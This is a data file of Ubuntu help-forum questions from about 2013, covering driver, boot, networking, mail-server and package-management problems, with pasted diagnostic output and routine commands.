372050	can not run evince . says shared library is missing	when trying to start evince ubuntu 12.04 responds me : % evince evince : error while loading shared libraries : libsm.so.6 : can not open shared object file : no such file or directory on the other hand ldd reports no problems . % ldd /usr/bin/evince linux-vdso.so.1 = > ( 0x00007fffa15ff000 ) libsm.so.6 = > /usr/lib/x86_64-linux-gnu/libsm.so.6 ( 0x00007f57bdb04000 ) libice.so.6 = > /usr/lib/x86_64-linux-gnu/libice.so.6 ( 0x00007f57bd8ea000 ) libevdocument3.so.4 = > /usr/lib/libevdocument3.so.4 ( 0x00007f57bd6b5000 ) ... i suppose there must be a problem with loading shared libraries . libsm is just a first one . asking ubuntu to be more verbose did not bring any idea to me . % export ld_debug=all % evince 6574 : 6574 : file=libsm.so.6 [ 0 ] ; needed by evince [ 0 ] 6574 : find library=libsm.so.6 [ 0 ] ; searching 6574 : search cache=/etc/ld.so.cache < -- -- - why not found ? 6574 : search path=/lib/x86_64-linux-gnu/tls/x86_64 : /lib/x86_64-linux-gnu/tls : /lib/x86_64-linux-gnu/x86_64 : /lib/x86_64-linux-gnu : /usr/lib/x86_64-linux-gnu/tls/x86_64 : /usr/lib/x86_64-linux-gnu/tls : /usr/lib/x86_64-linux-gnu/x86_64 : /usr/lib/x86_64-linux-gnu : /lib/tls/x86_64 : /lib/tls : /lib/x86_64 : /lib : /usr/lib/tls/x86_64 : /usr/lib/tls : /usr/lib/x86_64 : /usr/lib ( system search path ) 6574 : trying file=/lib/x86_64-linux-gnu/tls/x86_64/libsm.so.6 6574 : trying file=/lib/x86_64-linux-gnu/tls/libsm.so.6 6574 : trying file=/lib/x86_64-linux-gnu/x86_64/libsm.so.6 6574 : trying file=/lib/x86_64-linux-gnu/libsm.so.6 6574 : trying file=/usr/lib/x86_64-linux-gnu/tls/x86_64/libsm.so.6 6574 : trying file=/usr/lib/x86_64-linux-gnu/tls/libsm.so.6 6574 : trying file=/usr/lib/x86_64-linux-gnu/x86_64/libsm.so.6 6574 : trying file=/usr/lib/x86_64-linux-gnu/libsm.so.6 < -- -- - why it fails ? 6574 : trying file=/lib/tls/x86_64/libsm.so.6 6574 : trying file=/lib/tls/libsm.so.6 6574 : trying file=/lib/x86_64/libsm.so.6 6574 : trying file=/lib/libsm.so.6 6574 : trying file=/usr/lib/tls/x86_64/libsm.so.6 6574 : trying file=/usr/lib/tls/libsm.so.6 6574 : trying file=/usr/lib/x86_64/libsm.so.6 6574 : trying file=/usr/lib/libsm.so.6 6574 : evince : error while loading shared libraries : libsm.so.6 : can not open shared object file : no such file or directory but % unset ld_debug % ls -l /usr/lib/x86_64-linux-gnu/libsm.so.6 lrwxrwxrwx 1 root root 14 lip 25 2012 /usr/lib/x86_64-linux-gnu/libsm.so.6 - > libsm.so.6.0.1 % ls -l /usr/lib/x86_64-linux-gnu/libsm.so.6.0.1 -rw-r -- r -- 1 root root 30888 mar 2 2012 /usr/lib/x86_64-linux-gnu/libsm.so.6.0.1 problem occurs with evince only . other programs run flawlessly . regenerating /etc/ld.so.cache changes nothing . % ldconfig % ls -l /etc/ld.so.cache -rw-r -- r -- 1 root root 84443 lis 6 17:17 /etc/ld.so.cache % evince evince : error while loading shared libraries : libsm.so.6 : can not open shared object file : no such file or directory gv depends on libsm also and runs without problems . let 's compare % gv 6605 : 6605 : file=libxaw3d.so.6 [ 0 ] ; needed by gv [ 0 ] 6605 : find library=libxaw3d.so.6 [ 0 ] ; searching 6605 : search cache=/etc/ld.so.cache 6605 : trying file=/usr/lib/x86_64-linux-gnu/libxaw3d.so.6 6605 : 6605 : file=libxaw3d.so.6 [ 0 ] ; generating link map 6605 : dynamic : 0x00007f1b68327b88 base : 0x00007f1b680d5000 size : 0x000000000025e560 6605 : entry : 0x00007f1b680ea9e0 phdr : 0x00007f1b680d5040 phnum : 7 6605 : ... 6605 : file=libsm.so.6 [ 0 ] ; needed by /usr/lib/x86_64-linux-gnu/libxt.so.6 [ 0 ] 6605 : find library=libsm.so.6 [ 0 ] ; searching 6605 : search cache=/etc/ld.so.cache 6605 : trying file=/usr/lib/x86_64-linux-gnu/libsm.so.6 6605 : 6605 : file=libsm.so.6 [ 0 ] ; generating link map 6605 : dynamic : 0x00007f1b66e4fdb8 base : 0x00007f1b66c49000 size : 0x0000000000207158 6605 : entry : 0x00007f1b66c4ab20 phdr : 0x00007f1b66c49040 phnum : 7 6605 : ... here loader finds entry in its cache .
372051	wifi connectivity problem in 13.10	i use ubuntu 13.04 version and established a strong connection to my wifi router just fine , but it wo n't connect to the internet , i 'm using the built in mozilla firefox browser . what.seems to be the problem ? even i try terminal command sudo rfkill list but nothing happen
372054	how to choose dedicated videocard over integrated videocard in a laptop ?	i have a lenovo z580 laptop and it has 2 video cards intel hd graphics 2000 integrated in intel pentium dual core cpu b970 nvidia geforce gt 630m . i use bumblebee but it does n't work for virtual box ghost os or for wine . how i can remove/eliminate the integrated video card and use only nvidia geforce gt 630m ?
372056	ubuntu 12.10 loud fan noise hp compaq 615	i am totally new to linux , i installed it yesterday , since than i my fans are really loud , i did not have this problem on windows . i saw this post on this site how to control fan speed ? but i am totally lost with it because im a new user to ubuntu when i arrive to that page i see these lucid ( utils ) : utilities to read temperature/voltage/fan sensors 1:3.1.2-2 : all precise ( utils ) : utilities to read temperature/voltage/fan sensors [ universe ] 1:3.3.1-2ubuntu1 : all quantal ( utils ) : utilities to read temperature/voltage/fan sensors [ universe ] 1:3.3.1-2ubuntu2 : all raring ( utils ) : utilities to read temperature/voltage/fan sensors [ universe ] 1:3.3.2-2ubuntu1 : all saucy ( utils ) : utilities to read temperature/voltage/fan sensors [ universe ] 1:3.3.3-1ubuntu1 : all trusty ( utils ) : utilities to read temperature/voltage/fan sensors [ universe ] 1:3.3.3-1ubuntu1 : all so what is lucid ? trusty ? saucy ? and other ? i thought its some kind if a ubuntu type ( sorry for beeing silly here ) i checked my ubuntu version it just says ubuntu 12.10 so which one i need to download ? i saw there are terminal commands , im new to that too , will it cause some problem if i just copy and paste ? ps : i saw my graphics card is undetected as well i have a ati mobility radeon hd 3200 , could that cause the problem too ?
372057	edmiax mini wifi dongle ( rtl8188cus ) not working	unforunatley my edimax ew-7811un wifi dongle with an integrated realtek rtl8188cus chip is not working under my ubuntu 12.04 . after having it connected the first time it worked right away and i was able to connect to my wifi network . however the connection was unstable and it disconnected every couple of minutes . so i googled and found this tutorial on how to install the correct drivers : http : //forum.ubuntuusers.de/topic/realtek-rtl8188ce-treiber-installieren/2/ ( see the second post ) . after having executed all the steps my wifi stick gets not recognized as a network device at all . i tried this how to install driver for rtl8188cus wireless adaptor ? which unfortunately did n't chnage the situation . then i tried to follow this tutorial to figure out what went wrong : my wifi adapter is not working at all . where to start troubleshooting ? the device is not shown , when i execute sudo lshw -c network . do you have any ideas how to get it to work ?
372059	ca n't ping ubuntu server from outside network	just finished setting up my ubuntu server 12.04 as a web server at my house with broadband . everything is setup and works just fine until i tried to access it from outside . the public ip for the machine ( and also my router 's ) is 139.228.159.132 , and i can ping it and also view the website when i 'm connected under the same network via wifi . but when i try to access it via other network at the office , it wo n't respond , rto . i already set a static ip via /etc/network/interfaces but it still wo n't work , been 2 days since i 'm stuck at this problem . anyone can help ? thank ! fyi , i have also add port range forwarding 22-80 to my specific machine ( 192.168.1.113 ) on my linksys router .
372061	lost the vertical scroll function in touchpad after upgrading from 13.04 to 13.10	just upgraded from ubuntu 13.04 to ubuntu 13.10 , my laptop is a sony sve1512c6ew , scrolling worked perfectly in ubuntu 13.04 , doesnt work at all in 13.10 runs ubuntu 13.10 64bits ( btw , tested it i windows 8 environment works there ) hardware ok , have seen a number of other users with the same problem , well for starters have followed the tip on using the dconf editor , following the path : org > gnome > settings-daemon > peripherals > touchpad boxed in all for sure ... still cant get vertical scroll ... ... any ideas ? ? ? thanks in advance lars lundblad / please feel free to mail answers to lars @ yours.com input device information according to udev : input device subsystem : input devtype : n/a name : input7 number : 7 sysfs_path : /sys/devices/platform/i8042/serio1/input/input7 driver : n/a action : n/a seqnum : n/a device type : n/a device number : 0 device file : n/a device file symlinks : n/a touchpad device subsystem : input devtype : n/a name : mouse1 number : 1 sysfs_path : /sys/devices/platform/i8042/serio1/input/input7/mouse1 driver : n/a action : n/a seqnum : n/a device type : char device number : 3361 device file : /dev/input/mouse1 device file symlinks : /dev/input/by-path/platform-i8042-serio-1-mouse
372064	mdj not able to install ubuntu in hp pavilion 14 notebook	i have a hp pavilion 14 notebook pc with windows 8.1 sl . i am trying to install ubuntu 13.10 but i ca n't succeded . please help
372066	ca n't install the wireless driver in hp pavilion dv2419us	i 've just installed ubuntu 13.04 in an old hp pavilion dv2419us . the problem is , ubuntu does n't detect the wireless card . but it works fine in windows 7 . the following command returns nothing ! lspci -vvnn | grep 14e4 and the lspci output is : 00:00.1 ram memory : nvidia corporation c51 memory controller 0 ( rev a2 ) 00:00.2 ram memory : nvidia corporation c51 memory controller 1 ( rev a2 ) 00:00.3 ram memory : nvidia corporation c51 memory controller 5 ( rev a2 ) 00:00.4 ram memory : nvidia corporation c51 memory controller 4 ( rev a2 ) 00:00.5 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.6 ram memory : nvidia corporation c51 memory controller 3 ( rev a2 ) 00:00.7 ram memory : nvidia corporation c51 memory controller 2 ( rev a2 ) 00:02.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:03.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:05.0 vga compatible controller : nvidia corporation c51 [ geforce go 6150 ] ( rev a2 ) 00:09.0 ram memory : nvidia corporation mcp51 host bridge ( rev a2 ) 00:0a.0 isa bridge : nvidia corporation mcp51 lpc bridge ( rev a3 ) 00:0a.1 smbus : nvidia corporation mcp51 smbus ( rev a3 ) 00:0a.3 co-processor : nvidia corporation mcp51 pmu ( rev a3 ) 00:0b.0 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0b.1 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0d.0 ide interface : nvidia corporation mcp51 ide ( rev f1 ) 00:0e.0 ide interface : nvidia corporation mcp51 serial ata controller ( rev f1 ) 00:10.0 pci bridge : nvidia corporation mcp51 pci bridge ( rev a2 ) 00:10.1 audio device : nvidia corporation mcp51 high definition audio ( rev a2 ) 00:14.0 bridge : nvidia corporation mcp51 ethernet controller ( rev a3 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 05:09.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 05:09.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 05:09.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 05:09.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) the command lspci -nn | grep 0280 gives no output . any suggestion regarding this ?
372069	where does gedit store it 's plugin configuration and preferences ?	i have gedit-plugins installed for gedit on my previously broken system . on the new system , i want to restore gedit from my backed up home directory . i will like to know ! where does gedit store it 's configurations including plugins list , preferences etc . thanks for helping out .
372070	emacs editor copy and deletion	i am a huge fan of emacs.. but even after 1 year of practising on emacs i am unable to solve these three annoying issues about emacs please help me ! 1.whenever i want to copy the content from emacs into other things such as a website textarea i have to use gui copy button because ctrl+w does n't work . is there any way to do this from emacs-command line . 2.whenever i delete something using ctrl+shft+spc or ctrl+k etc i do n't want it to be stored in kill ring how do i do it ( i know ctrl+d does this but it deletes only one char at a time ) ? 3.whenever i select text by mouse and press backspace then text goes into kill ring ( which i want to change as mentioned ) but same does n't happen when i select text with ctrl+spc ( set mark ) and then ctrl+f/ctrl+b etc . please help me ! thanks in advanced !
372071	bluetooth device paired and connected ( no sound )	i 've got a bluetooth headset which works great in both windows 8 and android 4.2 however on ubuntu ( 13.10 ) it just does n't seem to work . i installed blueman , it paired and connected successfully when i tried audio sink but it still does n't show up in my sound settings nor pulseaudio which i installed and tried . all there is in my sound settings is `` analog output '' . i tried several fix like changing and adding things in /etc/bluetooth/audio.conf without any success . i 've restarted the bluetooth service several times in the process as well . let me know if you need more information from me and my system . kind regards , michael .
372072	how to get rid of 'grub rescue ' ?	while logged into windows , i deleted a disk partition which was containing ubuntu . when i restarted my pc , it is showing 'grub rescue ' command prompt . how to boot windows now ? i no longer require ubuntu . i have ubuntu live cd when i tried the following commend : sudo apt-get install lilo the following error is shown : err http : //archive.ubuntu.com/ubuntu/ natty/main lilo i386 1:22.8-10ubuntu1 404 not found [ ip : 91.189.92.156 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/lilo/lilo_22.8-10ubuntu1_i386.deb 404 not found [ ip : 91.189.92.156 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
372073	media server ... serving files ... ... ... ... ... for a limited time only	i’m new to ubuntu and am seeking help with a media server i have built . i have a couple of htpcs in my house running xbmc . i wanted to build one for the family room working double duty as a htpc , and media server to share movies , tv shows , music , etc . on my windows network . so using some spare old parts i had lying around i decided to go crazy and build my first linux box . i used ubuntu because it seemed to be the most user friendly variant , especially for people that are new to linux . i had to do a few things to get the media files shared properly on my network : made sure my two media drives auto-mount every time i boot the computer by editing the “fstab” file – “sudo nano /etc/fstab” installed samba - “sudo apt-get install samba” set a password for samba - “sudo smbpasswd –a username” edited the samba configuration file to make sure the computer was in my networks workgroup – “sudo nano /etc/samba/smb.conf” in the file manager ( not sure if that’s the right name for it ) , i right-clicked my media folders and set the sharing and permissions . the sharing was done without guest access , and permissions were set to ; owner , group , and others - access : create and delete files . adjusted the power management settings to never put the system into sleep mode . i checked to see if i had access to the files from a windows 7 machine and i did ( woo hoo ! ) . but when i tried to play any of my video files from the windows machine ( using vlc media player ) , they would only play for about 2-5 minutes and then they would stop with an error message saying that the file could not be accessed ( booo ... ) . i tried playing some files through xbmc running in windows and they worked for a bit longer ( about 10-15mins ) , but they also stopped playing . i installed the linux version of xbmc on the server and played the files locally with no problems . it doesn’t seem to be an issue with the files themselves , it seems to be a sharing problem on my network . so my question to the ubuntu gurus out there is : did i miss adding/editing something in the samba configuration file ? did i use the right method to share my media files ( file manager vs. using the terminal ) ? is it possible for the computer to still go to sleep without the screen going black ( does that even make sense ? ) . are there any special settings in ubuntu that i should be using since this computer as a media server ( is there a media server mode ? ... ! ... ? ) . any help on this matter would be greatly appreciated . thanks
372079	script to clean system	i want a script to clean my system . clean unused dependencies . clean apt-cache . clean residual-config files . remove broken packages . only keep the latest version of packages and remove other . specially linux-kernel . and all that you think that the script should contain . please guide me . ubuntu 12.04 with kernel 3.2.xxxx i exactly do n't know .
372081	postfix-dovecot email sending works with squirrel mail but not with thunderbird ?	i have setup an intranet email system using postfix , dovecot and squirrel mail , which is working fine , i can send and receive mail to all users on the system . i presume that the issue is in the postfix configuration , because when i configure thunderbird to send mail i am getting the following error : an error occurred while sending mail . the mail server responded : 4.1.8 < user @ intranetdomain.com > : sender address rejected : domain not found . please check the message recipient support @ intranetdomain.com and try again . also here is the relevant syslog entries : noqueue : reject : rcpt from host1.intranetdomain.com [ more information ] [ 192.168.11.1 [ more information ] ] : 450 4.1.8 < user @ intranetdomain.com > : sender address rejected : domain not found ; from= < user @ intranetdomain.com > to= < support @ intranetdomain.com > proto=esmtp helo= < [ 127.0.0.1 [ more information ] ] > i have configured mx records on the dns server and they respond appropriately when i query them for those mx records , so i do not think that is the issue . i think that my issue is caused by the default configuration of : smtpd_recipient_restrictions = reject_unknown_sender_domain , reject_unknown_recipient_domain , reject_unauth_pipelining , permit_mynetworks , permit_sasl_authenticated , reject_unauth_destination smtpd_sender_restrictions = reject_unknown_sender_domain since this is on an internal network and it will not be exposed to the internet as a whole which options can i remove safely ?
372085	locate a user 's bashrc file	really confused . upon running cat etc/passwd i have found this : postgres : x:117:126 : postgresql administrator , , , :/var/lib/postgresql : /bin/bash meaning i have a postgres user , right ? i want to change the bashrc environment file of this user to make commands available to it . /var/lib/postgresql does n't contain a bashrc file , and /bin/bash does n't contain it either , so i do n't really know what 's going on . all i know is a created postgres using the useradd command , so why do i have some weird user with no home directory ? so confused : (
372090	ubuntu version on external hardrive that shows up in grub ?	i was wondering , is it possible to have ubuntu installed on an external harddrive and still have it show up in grub ? of course , you would n't be able boot the other hdd os unless it was connected , but would this work ? i googled 'external hdd os show in grub ' and 'have external hdd show up in grub ' but they did n't bring up anything . does anyone have any resources to point me to ? i can see this as being useful for testing out new releases or having multiple oss installed without having to go through the bios boot choice . thanks !
372094	i can not boot up 13.04 . it asks for a password that i do n't have	i do n't remember creating a password and i have tried everything i can remember . i am currently trying to sign into ubuntu 13.04 but when i start up i get a blue box on a black screen that says enter password . i can not for the life of me remember it . after 3 attempts , it says failed to verify and then shuts down . i am now trying to boot from the installation disc but it requests the same password . i am not worried about backing anything up . i just need to get into the computer or reinstall . can anyone help or is the hdd locked and useless now ? thanks .
372096	the appearance of windows change when i connect the second monitor	i recently installed ubuntu and i found this problem . i have a nvidia 630m i think may be causing the problem when i connect my second monitor , change the look to a style windows 1998 . horrible ! i leave a video . http : //www.youtube.com/watch ? v=4egqob1vhcm any solution ? thanks - .
372101	fix the partition indexes or fix ubuntu efi	i have a gpt partition table . when i tried to repair the disk on my mac os x 10.9 it deleted the efi partition . i already created it manually but i have a problem : 1- the efi partition instead of being at /dev/disk0s1 it became /dev/disk0s16 . how can i reindex the partitions . 2- my linux partition was on /disk0s5 it became /disk0s4 that caused it not to boot . how can i change where to start at grub.efi backup and repartition is not a solution .
372103	ubuntu reboot suddenly	its the second day i have this issue , and ubuntu still reboot suddenly . nothing significatif in syslog . salim @ salimpc : ~ $ tail -f /var/log/syslog < br > nov 7 12:34:53 salimpc dbus [ 873 ] : [ system ] successfully activated service 'com.ubuntu.systemservice' salimpc dbus [ 873 ] : [ system ] activating service name='org.freedesktop.packagekit ' ( using servicehelper ) salimpc aptdaemon : info : initializing daemon salimpc aptdaemon.packagekit : info : initializing packagekit compat layer salimpc dbus [ 873 ] : [ system ] successfully activated service 'org.freedesktop.packagekit' salimpc aptdaemon.packagekit : info : initializing packagekit transaction salimpc aptdaemon.worker : info : simulating trans : /org/debian/apt/transaction/6933b4b977d944fa8714898c01bfeae4 < br > salimpc aptdaemon.worker : info : processing transaction org/debian/apt/transaction/6933b4b977d944fa8714898c01bfeae4 salimpc aptdaemon.packagekit : info : get updates ( ) nov 7 12:34:58 salimpc aptdaemon.worker : info : finished transaction /org/debian/apt/transaction/6933b4b977d944fa8714898c01bfeae4 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -previous post -- -- -- -- -- -- -- -- -- hi my ubuntu has rebooted suddenly ( 2 time till now in one hour ) . after login , a crash was indicated in /usr/sbin/ntop . below are the syslog and a screenshot of the crash . salim @ salimpc : ~ $ tail /var/log/syslog nov 6 18:25:38 salimpc ntop [ 1630 ] : **warning** packet truncated ( 9642- > 8232 ) nov 6 18:25:38 salimpc ntop [ 1630 ] : **warning** packet truncated ( 8274- > 8232 ) nov 6 18:25:38 salimpc ntop [ 1630 ] : **warning** packet truncated ( 11010- > 8232 ) nov 6 18:25:38 salimpc ntop [ 1630 ] : **warning** packet truncated ( 17850- > 8232 ) nov 6 18:25:38 salimpc ntop [ 1630 ] : **warning** packet truncated ( 8274- > 8232 ) nov 6 18:25:39 ntop [ 1630 ] : last message repeated 2 times nov 6 18:25:39 salimpc ntop [ 1630 ] : **warning** packet truncated ( 16482- > 8232 ) nov 6 18:25:40 salimpc ntop [ 1630 ] : **warning** packet truncated ( 11010- > 8232 ) nov 6 18:25:43 salimpc ntop [ 3075 ] : threadmgmt [ t3063068672 ] : ntop runstate : preinit ( 1 ) nov 6 18:25:43
372104	wireless does n't work ubuntu 13.04	i have ubuntu 13.04 installed on my laptop , and i have a problem . my wireless does n't work , and i really do n't know what to do . i ca n't give more informations because i do n't know what to say ... can you help me ? thank you !
372105	best way to ensure a vpn connection starts ( and hopefully remains )	ok , trying again : ) i tried to find the answer to this on my own , and that led me to the first suggestion in this topic ... which , through a series of unfortunate events , let me to hours and hours of hair-pulling before i got my system back to a usable state . so now i 'm just going to ask : what is the best way to reliably have a vpn connection started at boot , and is there a way to monitor it to ensure it is active ? i have ubuntu 12.04lts 64-bit . i have successfully configured openvpn and it works with manual start/stops no problem . when i reboot , of course , the vpn is no longer active . starting it works with : sudo nmcli con up id slickvpn.com i 'm sure i can just throw that into a startup file , but there seems to be so many of them and i 'm so new to it that the potential for a screw up ( without guidance ) seems high . also , that wo n't help me monitor to know that its up at any given point . i gather that 's what vpnautoconnect is , but with the problems that caused me ... i 'd rather avoid that software ( unless someone wants to hold my hand through that ) . thanks for suggestions . ps . i maybe should mentiont : this is a desktop ubuntu install , but its running as a server . its headless [ although a head is available if required ]
372106	could n't open the software-center and sources	failed to download repository information w : gpg error : ( http ) : //ppa.launchpad.net raring release : the following signatures could n't be verified because the public key is not available : no_pubkey 464ad83d4631bbea , w : failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i 've try all the way from the question 'failed to download repository information' thanks for the help
372107	no wireless in ubuntu 13.10 ( maybe need wireless driver )	hi after updating to ubuntu 13.10 i cant see the wireless networks on the network meny so what should i do ? tell me some commands you need to see to solve the problem . thanks ( i maybe need a wireless driver becouse i installed one when i haved 12.04 becouse i could not connect to wireless before too ) i cant connect to wireless that my problem so what do i need to do to get this wireless working again ? some outputs lsmod | grep rt1 nothing sudo modprobe rt18192cu fatal : module rt18192cu not found . iwconfig eth0 no wireless extensions . lo no wireless extensions . sudo iwlist wlan0 scan wlan0 interface does n't support scanning . rfkill list all nothing
372113	ubuntu-vm-builder and first-login interactive script	i 'm using ubuntu-vm-builder to create disk image on-the-fly . i want to use a script to change user keyboard on first login with -- firstlogin argument with the following script : # ! /bin/bash # running reconfigure of console-data to change keyboard layout sudo dpkg-reconfigure console-data sudo dpkg-reconfigure keyboard-configuration when i attempt my first login , ubuntu ask me for my root password without displaying ncurses to change keyboard layout and return directly to the bash prompt . any idea of how can i have interactive keyboard layout change display ? regards , thibault .
372114	how to run java script in geany application ?	i 'm trying to learn programming java script through `` codecademy '' website . so i downloaded geany application for more practice but i could not run java script into that application . i created a .java file into that and wrote my code and compiled but did n't work . if there is another good app for java script then let me know .
372115	ubuntu 12.10 not detecting windows 7	ubuntu 12.10 not detecting windows 7 on sony vaio laptop .my windows is 32 bit and ubuntu is 64 bit . i installed in the same way in my friend mechine it is working . but my windows 7 not detected by ubuntu 12.10
372116	use tree to make sitemap	time for my daily ubuntu lulz . i went to make a site map using `` $ tree public_html/ > tree.txt '' ok , looks good in gedit . put that in my site.. and all the pipes and dashes are garbage . .. have a look if you like > http : //nanocluster.umeche.maine.edu/tree.txt i get that this is probably some ascii compliance issue . is there a simple fix to get this looking like it does in gedit via firefox ? should i just write a script to embed the tree info into a web-page ?
372117	failed startup after install on macbook pro	a while back , my os x install became corrupt and so i used the os x recovery partition to backup my vital data onto an external hard drive before reformatting the disk . i then downloaded ubuntu 13.10 64 bit and burnt the iso to a cd . i got my mac to boot from the cd and i successfully installed the system . but after it asked to reboot and i hit `` ok '' , the computer rebooted and ejected the disk , but after a few seconds , all i got on the screen was a picture of a folder with a question mark on it . what exactly is this and what do i need to do to resolve it ?
372118	system shuts down abruptly after running less than 5 minutes	running ubuntu 13.10 on a hp pavilion 764n desktop pc . it was a windows xp box . i loaded the os with no issue . however when i run it my pc shuts down abruptly after less than 10 minutes up time . any ideas about tracing the problem ?
372120	non interactive reconfigure x11	i need to be able to allow all console users to call xinit in a non interactive way . so i would like to `` automate '' ( meaning find a way with no user interaction ) that runs dpkg-reconfigure -f noninteractive x11-common and to select the `` console '' answer . i know i could use debconf-set-selections at install time but i 'd rather like to be able to change this without ( re ) installing the package . is there a way to do that ?
372126	i need to authenticate when installing or removing software	i 'm having trouble to install updates , because it pop-up a window requiring to authenticate . and the problem is , i do n't know it . thanks !
372127	installing python-xml packages	i want to install python-xml package on ubuntu . i see this command for installing it : sudo apt-get install python-xml but $ sudo apt-get install python-xmlreading package lists ... done building dependency tree reading state information ... done e : unable to locate package python-xml should i add repository to fix it ?
372129	how to install mysql 5.5.34 completely from shell ?	i 'm try to install mysql 5.5.34 from shell in my server , i 'm new for linux.can anyone explain it simply ?
372137	slow lubuntu ( memory leaks ? ) : what can/should i do ?	so i have a pretty modern utrabook ( 1.7ghz core i5-2557m processor , 4gb of ram ) with lubuntu on it . it is pretty fast , but sometimes , after quite some while ( and many browser tabs open + a rails server running for quite a while ) , it can get slow ... really slow ... i 'm trying to figure out where the memory leak is . thing is , i have no clue how to analyse the task monitor , and to possibly close the leaking program , instead of having to reboot . questions : what is the best resources indicator ? cpu ? rss ? memory ? state ? is there anywhere else i could look around to analyse memory leaks ? thanks
372138	changed apache www folder	so i changed it from /var/www to /home/john/dropbox/www and i also did chmod 755 /home/john/dropbox/www but it still says you do n't have permission to access / on this server . i forgot how to do this , i guess i need to add the www-data usergroup to the folder ... i do n't remeber anymore , can you guys help me out .
372139	pleeease can someone help me to fix my bootup ?	ok i have a macbook pro with 3 partitions made using refit . the guy i bought it from had installed windows 7 for me and left the middle partition free so i could later install unbuntu 13.10 , oh and i have osx mavericks on the other . trouble is i tried to reboot into windows and nothing so i played around with grub and advanced unbuntu settings and now i have 2 linux penguins,2 icons for unbuntu a osx icon and windows icon . only 1 unbuntu icon works and the osx and the penguins are frozen stiff ! i am a newbie and i really need help
372140	mountmanager problem	new user of 12.04.3 installed in a separate drive . two user accounts were created but i can access only the 2 drives . i installed mountmanager so i could automount the drives for the other user . i immediately noticed after going to the home folder that there were double posting of my mounted drives in the toolbar . i could n't remove them . so i uninstalled mountmanager via synaptic . even now i could n't access them . during the uninstall i read that there were files in the /usr/share/backups/mountmanager that were not deleted . how do i go about it ?
372143	what is the safest way to remove a swap partition ?	i am running ubuntu 12.04 on a 64-bit hp laptop with a 16 gb flash drive . i do not have a working hard drive right now . when i installed ubuntu , i created a 2 gb swap partition on sdb1 . i have since learned that swap partitions are generally a bad idea on flash drives , so i would like to use my swap space for my other partitions . you can see my partition scheme in the link below . i have read that i just have to comment sdb1 out of the fstab file , boot from a gparted live cd , select swapoff for sdb1 , delete/merge with other partition , and everything 's good . but , i 've also read that messing with sdb1 can change the uuid of sdb2 or sdb3 and cause problems . is this true ? does initramfs use swap at all ? also , when i get ubuntu running on my laptop with an internal hard drive , does the swap partition help that much ? i have 6 gb of ddr3 . does the rule of 1.5xactual ram still apply ? it seems like quite a bit to me . thanks for the help ! update : i have removed swap . the process i followed is : right click swap partition in gparted and selected swapoff . used # to comment the swap partition out of fstab . i tried to boot from a live gparted cd , but i kept getting an error , so i ran gparted in ubuntu . deleted swap partition in gparted . unmounted /windows . expanded /windows to take the remaining space . mounted /windows . the / and /windows partitions each kept their own names and uuids , and everything is running fine . i have never seen any swap space being used before , and i do n't intend to use the hibernate function , so i think removing swap was a good idea .
372145	help i think i bricked my machine	took an old dell , installed windows 7 pro , expert , whatever they call it . everything runs fine . installed ubuntu alongside windows and could boot to either os . clicked by accident the install ubunto10.13 or something like that , and the computer started to , i assume replace windows with ubunto . this is all fine as that was my final goal anyways . at some point i got an error , that sadly i did not write down , and all i got was a flashing line in the top left corner of my display . reboot into set up and checked all setting there , seemed fine . told machine to boot to cd where ubuntu disc was , got error . reset to boot to usb after deselecting all other options . starts to load from usb , then get : grub loading stage1.5 . grub loading , please wait ... error 17 can not get box to boot to any of the drives , cd , dvd , or usb . put windows disc back in to try and restore windows , get : floppy diskette seek failure strike f1 key to continue , f2 to run the setup utility . neither key works , after several strikes , i get beeps . only option is to reboot and enter boot menu or setup . cant find anything there to help . so , have i completly bricked this thing , or can i save it ? thanks , kory
372146	upgrade only unity desktop on ubuntu 12.04.3	i 've an ubuntu 12.04.3 x32 os and i wan na upgrade to the newer version of unity ( the saucy salamander version ) without upgrade the os . i 've tried https : //help.ubuntu.com/community/pinninghowto but this one occurs a lot of dependencies and possibilities for broken packages . please , write if you solved earlier this !
372151	i was trying to update and i received this error	e : malformed line 8 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . not sure whats going on running 12.04lts
372153	using dpkg to install upgrade and dist-upgrade packages	so i 'm playing around with offline package installation on 12.04 server , having downloaded packages by retrieving and wgetting their uris using the instructions here : http : //www.webupd8.org/2009/11/get-list-of-packages-and-dependencies.html i did this with apt-get upgrade and apt-get dist-upgrade , then went about installing the downloaded packages using dpkg -i . so the process looked like so : get uris wget the packages to a folder ( upgrade packages to /upgrade and dist-upgrade packages to /dist-upgrade ) run dpkg -i /upgrade/*.deb and then dpkg -i /dist-upgrade/*.deb my question is : would this method of manually installing the updated packages correctly get everything updated , giving the same result as if i 'd just run apt-get upgrade and apt-get dist-upgrade normally ? or is there something that the normal apt-get commands do that would n't get done with this way ?
